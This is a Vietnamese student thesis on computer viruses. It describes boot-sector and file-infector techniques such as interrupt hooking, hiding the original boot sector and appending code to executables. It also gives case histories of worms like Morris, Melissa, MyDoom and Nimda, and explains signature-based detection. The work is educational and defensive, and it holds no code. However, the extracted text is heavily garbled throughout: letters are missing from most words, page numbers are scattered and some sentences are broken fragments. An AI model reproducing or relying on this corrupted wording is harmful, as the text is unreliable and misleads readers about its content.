Professional Documents
Culture Documents
Kt lun........................................................................................... 68
M u
Virus tin hc hin nay ang l ni bn khon lo lng ca nhng ngi lm cng tc tin hc, l ni lo s ca nhng ngi s dng khi my tnh ca mnh b nhim virus. Khi my tnh ca mnh b nhim virus, h ch bit trng ch vo cc phn mm dit virus hin c trn th trng, trong trng hp cc phn mm ny khng pht hin hoc khng tiu dit c, h b lm phi tnh hung rt kh khn, khng bit phi lm nh th no. V l do , c mt cch nhn nhn c bn v h thng, c ch v cc nguyn tc hot ng ca virus tin hc l cn thit. Trn c s , c mt cch nhn ng n v virus tin hc trong vic phng chng, kim tra, cha tr cng nh cch phn tch, nghin cu mt virus mi xut hin. ng vi mi h iu hnh u c nhng loi virus hot ng ring trn n nh ng vi h iu hnh DOS ta c virus DOS, ng vi h iu hnh Windows ta c virus Windows. V s pht trin ca tin hc gn lin vi n l s pht trin ca virus tin hc mi khi c mt phn mm, mt chng trnh, mt h iu hnh mi xut hin th virus mi cng xut hin theo v ko theo l chng trnh dit virus. V vy vic nghin cu, nhn dng v pht hin virus t c bin php thch hp ngn chn v phng tr virus t kt qu cao nht.
Li cm n
Em xin by t lng knh trng v bit n su sc ti PSG.TS Trnh Nht Tin, cc gio vin b mn khoa cng ngh thng tin, i hc Dn Lp Hi Phng hng dn v ng vin em trong qu trnh lm lun vn ny. Em xin cm n cc thy c gio trong trng to iu kin gip em hon thnh lun vn ny. Em xin gi li cm n ti gia nh bn b gip ng vin to iu kin cho em trong qu trnh lm lun vn. V thi gian khng nhiu, kinh nghim cn hn ch, khng trnh khi cc thiu st. Em mong nhn c cc kin ng gp ca cc thy c v bn b Em xin chn thnh cm n
1.1. GII THIU V VIRUS MY TNH 1.1.1. Virus my tnh v cc tnh cht 1.1.1.1. Khi nim
Virus my
, i kh
tnh .
c ngha l virus phi gim phc tp ca n, d dng cho cc lp trnh vin phn tch m lnh. Tnh ph hoi: tnh cht ny c th khng c mt s loi virus v n gin chng ch c vit ra th gin hoc kim nghim kh nng ly lan m thi. Tuy nhin, nhiu loi virus c kh nng ph hoi rt cao.
Cn Dos (Denial of Service), nhng virus ny pht tn i khp ni, nm vng nhng ni n ly nhim. Cui cng chng ng lot tn cng theo kiu t chi dch v (Denial of Service yu cu lin tc, t nhiu my tnh ng thi, lm cho cc my ch b tn cng khng th phc v c na v dn n t chi cc yu cu mi) vo cc h thng my ch khi ngi iu hnh n ra lnh, hoc vo cng mt thi im nh trc. Mt h thng in thoi ca Ty Ban Nha l ni b tn cng u tin.
Bt ng v tn v cch t tn nhng loi virus to ra nhng iu kh hiu trong lnh vc ny, t dn n nhng kh khn trong bin php i ph v gp phn gip cho virus d dng pht tn. y cng l ch c a ra tho lun ti hi ngh ton cu v chng virus (Virus Bulletin 2003) t chc ti Toronto-Canada cui thng 9/2003. Vo u thp k 1990 c mt h thng quy c cch t tn do T chc nghin cu virus my tnh (CARO) xut. Chnh thc c a ra nm 1991 v thnh thong c b sung thm vo, h thng ny ra nhng nguyn tc v nhng g c th v khng th s dng trong vic t tn cho virus, ng thi thit lp mt h thng cc c trng ca virus nh mc nguy him, nn b tc ng, h hng ca n Nick Fitzgerald, i din ca CARO, khi pht biu v h thng t tn hin nay cho bit nhng nguyn tc ca h vn c hiu lc. Kiu t tn mang tnh k thut th quan trng i vi cc chuyn gia virus, h c th bit c con virus thuc loi no, phin bn th my, thng qua tn gi ca virus. Nhng iu li khng qua trng vi hu ht nhng ngi s dng my tnh, nhng ngi thng c xu hng nh tn virus nh: I Love You v Mellisa (nh tn theo nhng s kin) thay v VBS.LoveLetter.A v W97.Mellisa.A. Tm li: bt ng trong vic t tn cho virus ca nhng nh nghin cu hay cng ty phn mm an ninh mng to ra cho virus cng loi nhiu tn khc nhau. iu to ra s ln ln cho mi ngi nhng i vi phn mm dit virus ch xem xt nhng c im, du hiu nhn bit ca virus m khng h quan tm n tn ca chng trong vic dit virus.
10
11
Phng php trn cng chnh l cch m cc Trojan my tnh p dng. u tin hacker bng cch no la cho nn nhn s dng chng trnh ca mnh. Khi chng trnh ny chy th v b ngoi cng ging nh nhng chng trnh bnh thng. Tuy nhin, song song vi qu trnh , mt phn ca Trojan s b mt ci ln my nn nhn. n mt thi im nh trc no chng trnh ny thc hin vic xa d liu, hay gi nhng thng ip m hacker mun ly n mt a ch nh trc trn mng. Khc vi virus, Trojan l mt on m chng trnh hon ton khng c tnh cht ly lan. N ch c th c ci t khi c kch hot v ly nhim c sang my tnh khc khi c ngi c gi i, cn virus th t ng tm kim nn nhn ly lan. Thng thng cc phn mm c cha Trojan c phn phi nh l cc phn mm tin ch, phn mm mi hp dn, nhm d thu ht ngi s dng. Bn cnh cc Trojan n cp thng tin truyn thng, mt s khi nim mi c dng t tn cho cc trojan mang tnh cht ring bit nh sau: BackDoor: L loi trojan (sau khi ci t vo my nn nhn) s t m ra mt cng dch v cho php k tn cng (hacker) c th kt ni t xa ti my nn nhn, t n s nhn lnh v thc hin lnh m k tn cng a ra. Phn mm qung co bt hp php - Adware v phn mm gin ip Spyware: Gy kh chu cho ngi dng khi chng c tnh thay i trang web mc nh (home page), cc trang tm kim mc nh (search page)..hay lin tc t ng hin ra (pop up) cc trang web qung co khi ta ang duyt web. Chng thng b mt xm nhp vo my ca ta khi ta v tnh gh thm nhng trang web c ni dung khng lnh mnh, cc trang web b kha phn mmhoc i theo cc phn mm min ph khng ng tin cy, cc phn mm b kha (crack, keygen).
12
13
Khi nim Su Internet cn bao gm cc virus ly lan qua mng chia s ngang hng peer to peer, cc virus ly lan qua cc dch v chatting v c bit l cc virus khai thc cc l hng phn mm ly lan. Cc phn mm (nht l h iu hnh v cc dch v trn ) lun cha ng nhng li tim tng (v d: li trn b m) m khng phi lc no cng c th d dng pht hin ra. Khi mt l hng phn mm c pht hin, khng lu sau s xut hin cc virus c kh nng khai thc cc l hng ny ly nhim ln cc my tnh t xa mt cch m thm m ngi ch my tnh hon ton khng hay bit. T cc my tnh ny, Worm s tip tc b qua cc my tnh khc trn mng Internet vi mt cch thc tng t. Phn loi virus s cung cp cho chng ta mt cch nhn nhn ng n v virus my tnh, t xy dng phng php hu hiu ngn chn chng.
14
15
Vn then cht m loi virus ny cn gii quyt l Boot sector (Master Boot sector) c ca a. Virus s thc hin vic thay th mt Boot sector mi, tuy nhin virus khng th thc hin c ht cng vic cho Boot sector (Master Boot sector) c v trong sector ny c cha thng tin v a v thc s virus khng th bit mt cch y sector ny s phi lm nhng g. Chnh l do ny m a s cc B-Virus khng b Boot sector c m virus gi Boot sector c vo mt vng no trn a v sau khi tin hnh xong tc v ci t ca mnh, n s c v trao quyn iu khin cho on m ca sector ny (tuy nhin c mt s con virus thc hin m ca mnh ln on m ca Boot sector c ch cha thng tin v a m khng ct sector ny i). Mi vic li c Boot sector c tip tc thi hnh nh bnh thng. Tuy nhin vic la chn ni ct gi Boot sector cng l mt iu kh khn v mi ni trn a u c th b sa i: FAT, Root Directory v nht l vng Data. Da vo cch gii quyt vic ct giu Boot sector c ny B-Virus c th phn thnh hai loi l SB-Virus v DBVirus.
16
1/. SB-Virus
Do tnh chp nhn mt mt d liu nn chng trnh ngn gn ch chim mt sector. Thng thng SB-Virus chn nhng ni m kh nng ghi ln l t nht ct Boot sector c. i vi a mm, cc ni thng chn l: - Nhng sector cui cng ca Root Directory v t khi ngi dng khai thc ht s entry ca th mc gc. - Nhng sector cui cng ca a v khi phn phi lin cung cho mt tp tin no , DOS bt u tm lin cung trng t u vng d liu cn c vo entry ca n trn FAT. i vi a cng th n gin hn v trn hu ht cc a track 0 ch cha Master Boot record trn mt sector, cn li cc sector khc trn track ny l b trng khng dng n. Do , cc SB-Virus v hu ht cc DB-Virus u chn nhng sector trng trn track ny lm ni n nu.
2/. DB-Virus
- i vi a s cc virus th kch thc 512 byte (thng thng kch thc ca mt sector l 512 bytes) khng phi l qu rng ri. Do h gii quyt bng cch thay th Boot sector c bng Boot sector gi. Boot sector gi ny lm nhim v ti tip phn m virus cn li trn a vo b nh ri trao quyn iu khin. Sau khi ci t xong phn ny mi ti Boot sector tht vo b nh. Phn m virus cn li c th c nm mt trong nhng ni : - i vi a mm: qua mt DOS bng cch dng nhng lin cung cn trng. Nhng entry tng ng vi cc lin cung ny trn FAT s b nh du l hng cho DOS s khng s dng n na. Phng php th hai u im hn l vt ra khi tm kim sot ca DOS bng cch to thm mt track mi tip theo track cui cng m DOS c th qun l (iu ny ch p dng vi a mm). Tuy nhin phng php ny c nhc im l c mt s loi a mm khng c kh nng qun l, khi track mi c thm s gy li khi virus tin hnh ly lan. Do vy phng php th nht vn c cc virus s dng nhiu hn.
17
- i vi a cng: m virus c th c ct gi ti nhng sector sau Master Boot record hoc nhng sector cui ca Partition sau khi gim kch thc ca Partition i hoc gii quyt tng t nh trn a mm (s dng nhng lin cung cn trng v nh du nhng lin cung ny trong bng FAT l hng cho DOS khng s dng na) . Ni chung cu trc chng trnh SB-Virus hay DB-Virus l nh nhau.
Phn khi to
u tin virus tin hnh thng tr bng cch t chp mnh vo vng nh cao. Sau m bo tnh pop up ca mnh n lun chim ngt 13h. Ngoi ra, phc v cho cng tc ph hoi, gy nhiuvirus cn c th chim cc ngt 8, 9.Sau khi khi to xong, Boot sector c c tr li ng v tr v trao quyn iu khin.
18
Phn thn
L phn quan trng ca virus, cha cc on m m phn ln s thay th cho cc ngt m n chim. C th chia phn ny thnh bn phn. + Phn ly lan: l phn chnh ca thn virus, thay th cho ngt 13h, c tc dng ly lan bng cch t sao chp mnh vo bt k a no cha b nhim. + Phn gy nhiu v ngy trang: khi bn cht virus c kho st mt cch tng tn th vic pht hin v dit virus khng cn l vn phc tp. Vic gy nhiu to nhiu kh khn cho ngi chng virus trong vic tm, dit virus v phc hi d liu. Vic ngy trang lm cho virus c v b ngoi nh bnh thng ngi dit virus v s dng my tnh khng pht hin ra chng. + Phn ph hoi: khng nht thit phi c. Tuy nhin a s cc virus u c phn ny, hin th ch gy trc chc nh, tru chc ngi dngcn c th ph hy d liu my tnh. Virus c th ph hoi mt cch ngu nhin hoc c nh thi.i vi loi virus c nh thi, virus s kim tra mt gi tr (c th virus xc nh ngy, gi, thng, nm, s ln ly, s gi my chy). Khi gi tr ny bng hoc vt qua ngng cho php n s tin hnh ph hoi. + Phn d liu: ct gi thng tin trung gian, nhng bin ni ti dng ring cho virus v Boot sector c.
19
1/. Chn u
Thng thng, phng php ny ch p dng i vi cc file dng .COM ngha l chng trnh lun PSP:100h. Li dng im ny, virus s chn on m ca n vo u file b ly v y ton b file ny xung pha di ngay sau n. u im: m virus d vit v c dng file .COM. Mt khc, s gy kh khn cho ngi dit trong vn khi phc file v phi c ton b file b nhim vo b nh ri tin hnh ghi li. Nhc im: trc khi tr quyn iu khin li cho file phi m bo u vo l PSP:100h, do phi chuyn ton b chng trnh ln a ch ny.
2/. Ni ui
Phng php ny c thy trn hu ht cc loi F-Virus v phm vi ly lan ca n rng hn phng php trn. Theo nh tn ca phng php ny m virus s c gn vo ngay sau file b ly. V do m ca virus khng nm ng u vo chng trnh cho nn n s nh v li file b ly bng cch thay i mt s d liu ca file sao cho u vo ch ng vo m ca n. u im: ly lan trn mi loi file kh thi, thng l file .COM, .EXE, .BIN, .OVL mt khc, s thay i d liu trn file b ly l khng ng k v vic ot quyn iu khin khng my kh khn. Nhc im: d dng cho ngi dit trong vic khi phc d liu v kh nh v m virus khi ly nhim vo file v kch thc file b ly l bt k.
20
21
Phn ph hoi: tng t nh B Virus Phn d liu: ct gi nhng thng tin trung gian, nhng bin ni ti dng ring cho virus v cc d liu ca file b ly, cc d liu ny s c khi phc cho file trc khi trao li quyn iu khin cho file.
2/. RF-Virus :
V thng tr v chn ngt nh B-Virus cho nn loi ny cng bao gm hai phn chnh: phn khi to v phn thn. Phn khi to: u tin virus tin hnh thng tr bng cch t chp mnh vo b nh hoc dng cc chc nng thng tr ca DOS. Sau m bo tnh pop up ca mnh n s lun chim ngt 21h. Ngoi ra, phc v cho vic ph hoi, gy nhiu, virus cn c th chim cc ngt 8,9,13h Sau khi khi to xong, n s tr li d liu c v quyn iu khin cho file b ly nhim. Phn thn: phn ny c cu trc tng t nh TF-Virus, cng c bn phn: ly lan, gy nhiu, ph hoi v phn d liu. Nhng v loi virus ny thng tr nn phn ly lan s thc hin trn nhng file yu cu c s dng ngt 21h ( b virus chim). Phn gy nhiu ngy trang cng phc tp tinh vi hn TF-Virus v n c th gim st h thng khi thng tr.
22
Nh vy, c th ly lan, virus marco lun phi c t nht mt marco thi hnh t ng c. Trong marco ny s c mt on m tin hnh ly lan bng cch t sao chp ton b m virus sang cc file khc. Ngoi ra, virus marco c th c thm cc phn ph hoi, gy nhim v ngy trang.
23
25
26
27
28
4/. Trojan ph hy :
Nhng con Trojan ny ch c mt nhim v duy nht l tiu dit tt c cc file trn my tnh. V d: CIH Nhng con Trojan ny rt nguy him v khi my tnh b nhim ch mt ln thi th tt c d liu mt ht.
1.5.5. Mc ch ca Trojan
Nhiu ngi ngh rng hacker dng Trojan ch ph hoi my ca h, iu hon ton sai lm. Trojan l mt cng c rt hu hiu gip ngi s dng n tm c rt nhiu thng tin trn my tnh ca nn nhn. - Thng tin v Credit Card, thng tin v khch hng. - Tm kim thng tin v account v d liu b mt. - Danh sch a ch email, a ch nh ring. - Account Passwords hay tt c nhng thng tin c v cng ty.
29
30
31
Ngy nay, khi nim Worm c m rng bao gm c cc virus ly lan qua mng chia s ngang hng peer to peer, cc virus ly lan qua a USB hay cc dch v gi tin nhn tc thi (chat), c bit l cc virus khai thc cc l hng phn mm ly lan. Cc phn mm (nht l h iu hnh v cc dch v trn ) lun tim n nhng li/l hng an ninh nh li trn b m, m khng phi lc no cng c th d dng pht hin ra. Khi mt l hng phn mm c pht hin, khng lu sau s xut hin cc virus c kh nng khai thc cc l hng ny ly nhim ln cc my tnh t xa mt cch m thm m ngi ch my hon ton khng hay bit. T cc my ny, Worm s tip tc b qua cc my tnh khc trn mng Internet vi cch thc tng t. Ta c th thy c s nguy him ca su Internet qua vic tm hiu su MyDoom. Ngy xut hin su MyDoom u tin: 26/01/2004 Ngy lan trn n Vit Nam: 27/01/2004 Cuc tn cng ca MyDoom ln nh im vo ngy 31/01/2004 khi c hng triu email nhim MyDoom cng ng lot gi ti Website ca Yahoo lm nghn mch. Bc tng la v b lc (Filewall v Filter) ngay lp tc c dng ln ngn chn v loi b tt c cc email c tiu : Test, Hi, Hello, Mail Delivery System, Mail Transaction Failed, Server Report, Status Error d y cng l tiu Yahoo hay s dng. D thit lp h thng bo v kp thi, trang web Yahoo t 8h17 n 12h10 trong ngy 31/01/2004 cng b tn cng bng lnh DoS (Denial of Service) v khi g dng lnh http://www.mail.yahoo.com/ th ng dn c thay th bng http://www.search.com/. Mi hot ng trn Website ny gn nh t lit.
33
Bin th su mi c gi l MyDoom.B (cn c tn l Norvarg.A, Mimailk) c kh nng chng truy cp vo cc trang web cung cp phn mm chng virus. Trong chng trnh vit ban u ca MyDoom ch to ln sng mail rc v tp trung chun b cho t ph hoi tng lc t ngy 01- 12/02/2004 vo website ca SCO Group Inc. Vi bin th mi MyDoom.B c b sung thm cu lnh tn cng thm website Microsoft. Su MyDoom c vit c ch nh l khng tn cng vo cc a ch email ca cc c quan chnh ph, mt s trng i hc, v mt s hng bo v my tnh, k c Symantec. Cc my tnh chy h iu hnh Windows XP ca Microsoft c nguy c b ly nhiu nht. Theo cc chuyn gia cng ngh, thit hi ti chnh do su MyDoom k c vic nh ch mng Internet v thit hi c tnh bng con s hng t . Phn mm dit MyDoom c cp nht u tin vo ngy 28/01/2004 (ca hng Symantic) 160.000 email nhim virus c gi n cho mt cng ty ch trong 60 pht ti USA. M nhiu cng nht: 71 cng , t cng 3127 n cng 3198. Symantec thng k c c ti 2.100 h thng khc nhau trn mng ang qut cc ca sau do MyDoom to ra. 50.000 h thng my tnh b nhim virus v b khng ch t xa, nguy c cho t tn cng tng lc. 300 triu th mang virus c pht tn, chim 1/12 tng lng email lu chuyn trn Internet trong hai ngy 500.000 my tnh b nhim MyDoom ch sau 3 ngy (k t khi pht hin su). 142 quc gia trn th gii b nhim.
34
1.6.2.1. Su Morris
Su Morris l su my tnh u tin c pht tn qua Internet v cng l con su u tin thu ht c s ch ng k ca cc phng tin thng tin i chng. Tc gi ca n l Robert Tappan Morris, mt sinh vin ti i hc Cornell. Su Morris c th ln mng vo ngy 2 thng 11 nm 1988 t hc vin MIT, n c pht tn t MIT che du thc t l con su c bt ngun t Cornell. (Robert Tappan Morris hin l gio s ti MIT.) Sai lm nghim trng bin con su t ch ch l mt th nghim tr thc c tim nng v hi thnh mt su tn cng t chi dch v y ph hoi l ti c ch ly lan. Con su xc nh xem c xm nhp mt my tnh mi hay khng bng cch hi xem hin c mt bn sao no ang chy hay cha. Nhng nu ch lm iu ny th vic xa b n li qu d dng, bt c ai cng ch phi chy mt tin trnh tr li rng "c" khi c hi xem c bn sao no cha, v con su s trnh. trnh chuyn ny, Morris thit k con su t nhn i vi xc sut 40%, bt k kt qu ca vic kim tra ly nhim l g. Thc t cho thy t l nhn i ny l qu cao v con su ly lan nhanh chng, lm nhim mt s my tnh nhiu ln. Ngi ta thng k rng c khong 6.000 my tnh chy Unix b nhim su Morris. Paul Graham ni rng "Ti chng kin ngi ta xo xo ra con s ny, cng thc nu n nh sau: ai on rng c khong 60.000 my tnh ni vi Internet, v con su c th nhim 10% trong s ". M c tnh thit hi vo khong t 10 n 100 triu la.
35
Robert Morris b x v buc ti vi phm iu lut nm 1986 v lm dng v gian ln my tnh (Computer Fraud and Abuse Act). Sau khi chng n, anh ta b pht 3 nm n treo, 400 gi lao ng cng ch v khon tin pht 10.050 la M. Su Morris i khi c gi l "Great Worm" (Su khng l) do hu qu nng n m n gy ra trn Internet khi , c v tng thi gian h thng khng s dng c, ln v nh hng tm l i vi nhn thc v an ninh v tin cy ca Internet.
1.6.2.2. Su Kakworm
Kakworm (KAV) l mt con su. N c xy dng vi mc ch xm nhp vo ch d b tn thng ca s bo v trnh duyt Internet Explorer hay chng trnh Outlook Express. Bn nng cp sa cha cho tnh d b tn thng ny c Microsoft a ra v cn thit phi nng cp li ngay (theo thng co an ton MicrosoftMS99-032). Nhng trnh duyt Microsoft v th tn in t cha b nh hng. KAV c gn vo trong ch k HTML ti tin nhn. Ngi dng khng nhn thy n bi v khng c dng vn bn no c th hin th n ra mn hnh (KAV c vit bng JavaScript). Ngi dng khng cn kch hot vo bt k file nh km no hoc thc hin bt k hot ng no kch hot KAV. Ch cn ngi dng xem th l con su KAV c th xm nhp vo h thng. c kch hot mt ln, KAV lu file KAK.HTA vo trong th mc khi ng ca Windows. Ln sau khi my tnh c khi ng, KAK.HTA chy v to ra KAK.HTA trong th mc Windows. Trong thng no cng c mt ln sau nm gi chiu con su KAK s hin th thng bo Kagou - Anti - Krosoft ni khng phi l hm nay v sau tt my tnh. KAK c xy dng da vo Bubbleboy, con su u tin c th lan truyn m khng cn ngi dng phi m file nh km.
36
37
Nhng file a phng tin vi phn m rng l MP2 v MP3 th c sao chp ti mt file mi cng tn v phn m rng .VBS cng c thm vo. Con su tm kim mt chng trnh client MIRC v nu tm thy, s th mt bn sao v file HTML c thit k gi con su qua MIRC . Nhng file virus nguyn bn c s nh hng rt nhiu, nhiu bin th pht trin nhanh chng v tri rng ra. Hn 20 bin th c bo co v trong thi gian s lng bin th thc t nhiu hn s lng bin th c bo co. Mt vi n tng nht c th ni n: Ch fwd: khng c ni dung no, file nh km: very funy.vbs. Ch Ngy nhng ngi m: c ni dung Chng ta c th hot ng rt t th gi ca bn khong 326.92 USD cho ngy l c bit nhng ngi m. Chng ti gn mt danh sch n hng chi tit ti a ch email ny. Xin in ra file nh km v gi n trong mt ch an ton. Cm n mt ln na v mong c mt ngy nhng ngi m hnh phc: mothersday@subdimension.com, file nh km: mothersday.vbs. Ch : virus ALERT !!!, gi t: support@symatec.com, ni dung: khch hng Symantec thn mn, trung tm nghin cu AV ca Symantec bt u nhn nhng bo co lin quan ti VBS.LoveLetter. Mt virus vo mt bui sng sm ngy 4/5/2000 GMT. Con su ny xut hin bt ngun t vng Thi Bnh Dng Asia. S phn phi ca virus ny lan rng v hng trm trong hng nghn nhng c my c bo co b ly nhim, file nh km: protect.vbs. Ch : Lm sao bo v chnh ta khi con rp ILOVE !, ni dung: t y th ta s c cch loi tr virus tnh yu, file nh km: Virus-ProtectionIntruction.vbs.
38
1.6.2.4. Su Melissa
Melissa l mt s kt hp gia virus marco v con su email. Con su u tin c tm thy vo th su, ngy 26 thng 3 nm 1999 v s dn tri ra c thc hin rt nhanh chng xung quanh th gii . V c bn, khi mt ngi dng kch vo file .DOC nh km theo th in t chng s chy c virus marco. Mt trong nhng vic u tin m virus s lm l nh dng v gi mt thng bo ti 50 a ch u tin trong danh sch a ch Outlook. Ch liu l Tin nhn quan trng t <Username ca bn >.V ni dung tin nhn: y l ti liu m bn hi v ....(khng cho bt c ai khc thy). Gn lin ti thng bo ny l ti liu hin thi ang lm vic. T khi Mellissa l virus v ly nhim file NORMAL.DOC n c th gi file ly nhim ra ngoi ging nh l ci g ht sc quan trng t my tnh nhn c. Vo trng hp him c ni pht, gi, ngy v thng l ging nhau (8 gi 8 pht ngy 8 thng 8) virus s chn mnh Hai mi hai, thm vo b ba t ghi im, cng vi nm mi im cho vic s dng tt c nhng bc th ca ti. Tr chi kt thc. Phn phi ban u ca virus Melisa l vo mt file gi l LIST.DOC ci m cha ng nhng mt khu ca nhng website X-rated, nhng website khng lnh mnh.
39
1.6.2.5. Su Nimda
Nimda l mt trong s nhng con su phc tp c xy dng theo s thu mn. N ly nhim file, thc hin dn tri qua ng Website, ng th tn in t, v s dn tri qua khai thc vng mng cc b. N ly nhim tt c cc phin bn ca Windows t Windows95 n Windows2000 cng nh IIS ca Microsoft. Nimda cng ly lan qua Website ng khng kn v vy m cc trnh duyt s ly lan c vic nhn trang Web. Cui cng, Nimda l con su u tin s dng my tnh ca ngi dng qut mng cc b xc nh nhng c my c th b tn thng ng sau bc tng la c th tn cng (trc y ch nhng con su ly lan qua server mi lm vic ). Nimda s dng mt vi nhc im c bit n trong nhng server IIS Microsoft. Mt s nhc im c nhc n ti a ch: http://www.microsoft.com/tech/security/bulletin/ms00-078.asp http://www.microsoft.com/tech/security/bulletin/ms01-020.asp Su Nimda s dng mt s phng php sau lan truyn: - T khch hng n khch hng qua th tn in t v ly nhim file.EXE - T khch hng n khch hng qua mng chia s cc b. - T ngi phc v mng n khch hng qua trnh duyt ca nhng website. - T khch hng n ngi phc v mng qua s tch cc qut v s khai thc tnh d b tn thng ca Microsoft IIS 4.0/5.0 directory travarsal. - T khch hng n ngi phc v mng qua s qut nhng ca sau c li bi con su Code Red II v sadmind/IIS.
40
41
42
Nimda trn my tnh ca nn nhn. Nimda thng thng xut hin nh mt file nh km README.EXE vi mt email, nhng c th l ra nh bt k ci no khc. File c ui .EXE vi hn 50 c tnh trong file gc c bn. Nu chy, bn thn n trc ht sao chp ti mt th mc tm thi vi mt ci tn t ngu nhin dng MEP*.TMP ( u c * l c i din nhng c tnh ngu nhin). Ri sau t ci th mc ny c t mnh thc hin bng cch s dng dng lnh ty chn -Dontrunold ) . S dng nhng thao tc s hc s gip con su xc nh liu xem n c th xa file (trong th mc tm). Nu m lm c th con su s xy dng c cng c truyn nhim s cp ca n: mt MIME c m ha sao cho c th sao chp chnh n cho nhng tin nhn nhiu phn m c th gn vo. Nhng con su mi ny s c gn cho mt ci tn ngu nhin v c ct gi trong mt th mc tm thi. By gi th n sn sng thc thi cng vic. Cui cng, con su sao chp chnh n ti RICHED20.DLL, trong th mc Windows\System, v t file n vo h thng. Khi Nimda c thc thi tm kim nhng ti nguyn mng dng chung v bt u qut nhng file c chia s. Mt s file c phn m rng .DOC v .EML n ang tm kim, khi tm thy, RICHED20.DLL c sao chp ti th mc ca chng sao cho n s c chy khi mt thnh phn OLE c cm trn my tnh t xa. iu ny, sau s gy ra qu trnh truyn nhim trn my tnh t xa. Mt vi bn sao ca con su lm mt s vic sau: N sa i kha [Software \ Microsoft \ Windows \ CurrentVersion \ Explorer\Advanced] nhng file n khng cn nhn thy c. iu ny s che du con su trong Explorer. N to thm ti khon Guest trn h thng b ly nhim v ghp ti khon Administrator v Guest thnh nhm c bit. S dng iu ny n s to ra chia s " c:\ vi y nhng quyn truy cp c bit. N xa nhng kha con t kha [ SYSTEM \ CurrentControlSet \ Servieces \lanmanserver \ Shares \ Security ] m tc dng vic lm l v hiu ha c s chia s an ton.
43
Chng 2. NHN DNG V PHT HIN VIRUS 2.1. K THUT NHN DNG VIRUS 2.1.1. Nhn dng chnh xc mu (Signature based delection)
L cng vic nhn dng chnh xc cc virus khi chng trnh Anti Virus AV c mu ca virus . K thut ny c th m t n gin nh sau: cc file cn kim tra virus c phn tch v so snh vi mu virus bit trc, nu pht hin mt on m virus th file c th b ly nhim virus v phn mm thc hin bin php loi b virus khi file b ly nhim. K thut nhn dng chnh xc mu virus khin cho cc phn mm lin tc phi cp nht c s d liu c kh nng nhn bit cc loi virus mi cng cc bin th ca n. Cc phn mm dit virus u s dng k thut ny qut virus. S cc m nhn dng cng ln th kh nng dit virus ca AV cng cao. Tt c cc k thut nhn dng khc ra i u vi mc ch b tr cho nhng thiu st ca k thut nhn dng ny. + u im ca k thut nhn dng chnh xc mu virus: chnh xc ca vic nhn dng virus cao, t nhm ln. Kt qu ca vic dit virus tt hn. Cc k thut nhn din tng i ch cho php nghi ng mt file c phi l virus hay khng. Nhn din chnh xc cho php loi b cc triu chng i km vi virus, khi phc li h thng.
44
+ Nhc im ca k thut nhn dng chnh xc mu virus: Khuyt im ln nht ca k thut nhn dng chnh xc mu l khng th i ph c vi cc virus mi hoc cha xut hin khi cha c mu nhn din. Khi lng c s d liu lu tr cc mu virus ln, lm cho kch thc ca phn mm dit virus ln. K thut ny i hi phi cp nht c s d liu lin tc nn mt nhiu chi ph v thi gian, tin bc, cng sc.
45
46
+ Nhc im: Cch scan ny kh b ng vi h virus, v d nu tm cch chn thm hay xa 1 byte trong file binary ca virus (vn phi m bo virus chy c) m byte ny nm trc phn offset sign th tt yu phng php ny khng th nhn ra mu virus sau khi b thay i.
String ca 2 mu virus
47
Chng ta s c 2 string tng ng, nhng 2 offset khc nhau (t sau, mi khi nhc n cc string t file nh phn, ti s vit dng chui cc s hexan (thp lc phn) tin quan st):
Nhn 2 bng s liu trn chng ta c th to mt m nhn dng chung cho c 2 virus ny l: String: 64 75 6E 67 63 6F 69 00 Offset: a ch Entry Point + 60 + u im: Vic m rng nh th ny s lm m rng di virus c nhn dng. V d khi chnh sa mt s bytes nh cch bn trn thc hin nhng nu sau v tr Entry point nh c v vn cn tn ti cc byte nh ban u th vn c th nhn ra bng sign cp nht theo cch ny. + Nhc im: Vic cp nht i hi nhiu thng tin hn phng php offset tnh Scan engine phi c c ch lm vic phc tp hn thch ng vi c ch scan ny. Do phng php ny ly v tr offset da vo mt phn thng tin no ca mt nh dng file thch hp nn b gii hn mt s nh dng file.
Chc nng ny cc phn mm dit virus thng cho php la chn kch hot hoc khng, mc hot ng (s dng mc hot ng tch cc, hot ng trung bnh mc c, hay hot ng mc thp - mc nh thit lp thng l kch hot sn mc c) bi a s chng c th chim ti nguyn v lm chm h thng i vi cc my tnh khng mnh.
49
50
51
1/. i vi B-Virus:
So snh tng b nh BIOS bo co vi ton b b nh m chng trnh c c sau khi t kim tra s chnh lch. Du hiu chnh lch b nh cng cha kt lun c s tn ti ca virus, m l c s tin hnh bc hai v s chnh lch cng c th l do mt chng trnh bnh thng lm hoc RAM b hng mt phn. Bt u t a ch ca vng cao, tin hnh d tm bng k thut qut: d tm on m c trng ca Virus trong vng cao. Mi s tm thy u c th cho php kt lun c virus trong b nh. Trong trng hp khng pht hin, kh nng tn ti mt B-virus mi vn c th xy ra. Bng du hiu b nh b thiu ht, ngt13h tr v vng nh thiu ht v vng ny c m nguy him th c th kt lun tn ti B-Virus.
52
2/. i vi RF-Virus:
C th dng k thut qut d tm m c trng ca virus t a ch thp cho n cao hoc dng phng php gi ngt nhn dng m chnh cc virus ci t t nhn din n trong b nh. Trong trng hp khng pht hin, kh nng tn ti mt RF-Virus mi vn c th xy ra. Bng du hiu ngt 21h tr v vng nh c m nguy him th vic kt lun c RF-Virus mi l kh chnh xc. D Tm Trn a Vic d tm trn a phi thc hin sau khi kim tra b nh khng c virus hoc nu c th c khng ch. Nh a s cc chng trnh chng virus khc chng trnh cng p dng phng php qut tm on m c trng pht hin virus. u tin l qut vng Boot tm B-Virus, sau qut cc file tm F-Virus, Trojan v Worm. qut vng Boot dng ngt 13h chc c sector 02h ca BIOS c vo b m v tin hnh qut tm m virus c trng. qut file dng cc chc nng truy xut file ca ngt 21h: chc nng m file 03Dh, sau dng chc nng c file 03Fh vo b m ri cng tin hnh qut tm m virus.
3.2.1. B-Virus
Nhiu ngi cho rng vic dit virus v khi phc a ch n gin l ghi mt Boot sector sch ln Boot sector c c virus. Tuy nhin, nu Boot sector ca a c nhim v c bit th rt kh thc hin, cng cha k a c bn tham s m ch cn b virus lm sai lch cht t cng dn n trng hp khng kim sot c a (vic ny hp l nu Boot sector sch chnh l Boot sector ca a c ct gi trc ). V vy, cch tt nht l phi khi phc Boot
53
